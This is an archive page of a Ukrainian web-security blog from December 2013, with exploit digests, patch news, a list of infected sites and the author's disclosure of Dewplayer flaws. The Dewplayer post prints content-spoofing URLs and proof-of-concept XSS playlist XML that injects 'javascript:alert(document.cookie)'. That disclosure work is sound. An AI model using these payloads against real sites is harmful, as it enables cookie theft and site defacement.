Архів за Грудень, 2013

Добірка експлоітів

17:22 21.12.2013

В даній добірці експлоіти в веб додатках:

  • TP-Link TD-8840t - CSRF Vulnerability (деталі)
  • Cisco DPR2320R2 - Multiple CSRF Vulnerabilities (деталі)
  • TVT TD-2308SS-B DVR - Directory Traversal Vulnerability (деталі)
  • VICIdial Manager Send OS Command Injection Vulnerability (деталі)
  • Symantec Altiris DS SQL Injection Exploit (деталі)

Уразливості в плагінах для WordPress №128

23:53 20.12.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Videowall, dhtmlxSpreadsheet та WPLocalPlaces. Для котрих з’явилися експлоіти. Videowall - це плагін для розміщення списку відео, dhtmlxSpreadsheet - це плагін для розміщення таблиць, WPLocalPlaces - це плагін.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в Microsoft Internet Explorer

22:46 20.12.2013

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.

Численні пошкодження пам’яті і підвищення привілеїв.

  • Microsoft Security Bulletin MS13-097 - Critical Cumulative Security Update for Internet Explorer (2898785) (деталі)

Вийшли PHP 5.3.28, 5.4.23 і 5.5.7

20:14 20.12.2013

Нещодавно, 12 грудня, вийшли PHP 5.3.28, 5.4.23 і 5.5.7. У версії 5.3.28 виправлено дві уразливості, у версії 5.4.23 виправлено біля 10 багів та одна уразливість, а у версії 5.5.7 виправлено декілька багів та одна уразливість. Дані релізи направлені на покращення стабільності та безпеки гілок 5.3.x, 5.4.x і 5.5.x.

У PHP 5.3.28 виправлено:

  • Дві уразливості в модулі OpenSSL (CVE-2013-4073 і CVE-2013-6420).

У PHP 5.4.23 і PHP 5.5.7 виправлено:

  • Уразливість в модулі OpenSSL (CVE-2013-6420).

По матеріалам http://www.php.net.

Добірка уразливостей

17:27 20.12.2013

В даній добірці уразливості в веб додатках:

  • HP Service Manager, Remote Disclosure of Information, Cross Site Scripting (XSS) (деталі)
  • Zenphoto 1.4.5.2 multiple vulnerabilities (деталі)
  • SQL injection vulnerability in Zabbix (деталі)
  • Vanilla Forums <= 2.0.18.5 (class.utilitycontroller.php) PHP Object Injection Vulnerability (деталі)
  • IcedTea-Web vulnerabilities (деталі)

Уразливості в Dewplayer

23:51 19.12.2013

25.10.2013

У лютому, 02.02.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в Dewplayer. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

19.12.2013

Content Spoofing (Content Injection) (WASC-12):

http://site/dewplayer.swf?mp3=1.mp3
http://site/dewplayer.swf?file=1.mp3
http://site/dewplayer.swf?sound=1.mp3
http://site/dewplayer.swf?son=1.mp3

Це для старих версій плеєра. У версіях Dewplayer 2.x з цих 4 варіантів є тільки mp3.

Content Spoofing (Content Injection) (WASC-12):

http://site/dewplayer.swf?xml=1.xml

1.xml

<playlist version="1">
<trackList>
<track>
<location>http://site/1.mp3</location>
<creator/>
<album/>
<title>Music</title>
<annotation/>
<duration/>
<image/>
<info/>
<link/>
</track>
</trackList>
</playlist>

2.xml (з зображенням)

<playlist version="1">
<trackList>
<track>
<location>http://site/1.mp3</location>
<creator/>
<album/>
<title>Music</title>
<annotation/>
<duration/>
<image>http://site/1.jpg</image>
<info/>
<link/>
</track>
</trackList>
</playlist>

XSS (WASC-08):

http://site/dewplayer-vinyl.swf?xml=xss.xml
http://site/dewplayer-vinyl-en.swf?xml=xss.xml

xss.xml

<playlist version="1">
<trackList>
<track>
<location>javascript:alert(document.cookie)</location>
<title>XSS</title>
</track>
</trackList>
</playlist>

http://site/dewplayer-vinyl.swf?xml=xss2.xml
http://site/dewplayer-vinyl-en.swf?xml=xss2.xml

xss2.xml

<playlist version="1">
<trackList>
<track>
<location>1.mp3</location>
<title>XSS</title>
<link>javascript:alert(document.cookie)</link>
</track>
</trackList>
</playlist>

Уразливі Dewplayer 2.2.2 та попередні версії.

Виконання коду в HTTP::Body

22:46 19.12.2013

Виявлена можливість виконання коду в HTTP::Body.

Уразливі продукти: HTTP::Body 1.17 модуль для Perl.

Небезпечна робота з тимчасовими файлами.

Вийшов WordPress 3.8

20:03 19.12.2013

В грудні, 12.12.2013, вийшла нова версія WordPress 3.8.

WordPress 3.8 це перший випуск нової 3.8 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, а також виправлено чимало багів.

Серед головних покращень зокрема можна відзначити новий дизайн адмінки та нова тема по замовчуванню, адаптація до різних пристроїв, різні кольорові схеми адмінки, перероблене управління шаблонами та віджетами.

Окрім покращень для користувачів також були зроблені численні покращення для розробників.

Добірка експлоітів

17:26 19.12.2013

В даній добірці експлоіти в веб додатках:

  • Juniper Junos J-Web - Privilege Escalation Vulnerability (деталі)
  • TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS (деталі)
  • Zend-Framework - Full Info Disclosure Vulnerability (деталі)
  • PHP 5.x + FastCGI Remote Code Execution Vulnerability (PoC) (деталі)
  • Vivotek IP Cameras RTSP Authentication Bypass (деталі)

Інфіковані сайти №180

22:46 18.12.2013

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://elite-bijou.com.ua - інфекція була виявлена 11.11.2013. Зараз сайт входить до переліку підозрілих.
  • http://carhelp.info - інфекція була виявлена 13.11.2013. Зараз сайт не входить до переліку підозрілих.
  • http://062.ua - інфекція була виявлена 17.11.2013. Зараз сайт не входить до переліку підозрілих.
  • http://zirki.info - інфекція була виявлена 18.12.2013. Зараз сайт не входить до переліку підозрілих.
  • http://terrawomen.com.ua - інфекція була виявлена 21.10.2013. Зараз сайт не входить до переліку підозрілих.